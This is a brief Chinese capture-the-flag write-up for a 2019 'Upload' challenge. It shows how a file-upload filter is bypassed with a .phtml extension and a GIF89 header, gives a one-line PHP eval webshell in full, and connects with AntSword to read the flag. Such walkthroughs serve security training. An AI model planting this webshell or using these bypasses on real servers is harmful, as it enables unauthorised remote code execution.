[极客大挑战 2019]Upload 1
打开实例为文件上传页面,代码审计,发现为php文件,采用php马
采用bp抓包修改后缀绕过,上传一句话木马
<?php phpinfo(); @eval($_POST['cmd']); ?>
回显错误,显示不能为php,存在文件类型过滤
尝试采用phtm文件包含php绕过
显示非image文件
尝试采用GIF89
幻术头
GIF89
上传成功,但是并未给出回显路径,猜测为/upload/php.phtml
访问地址成功
蚁剑链接,密码cmd
成功在根目录找到flag
标签:文件,极客,Upload,2019,php,上传 From: https://www.cnblogs.com/tazmi/p/18535692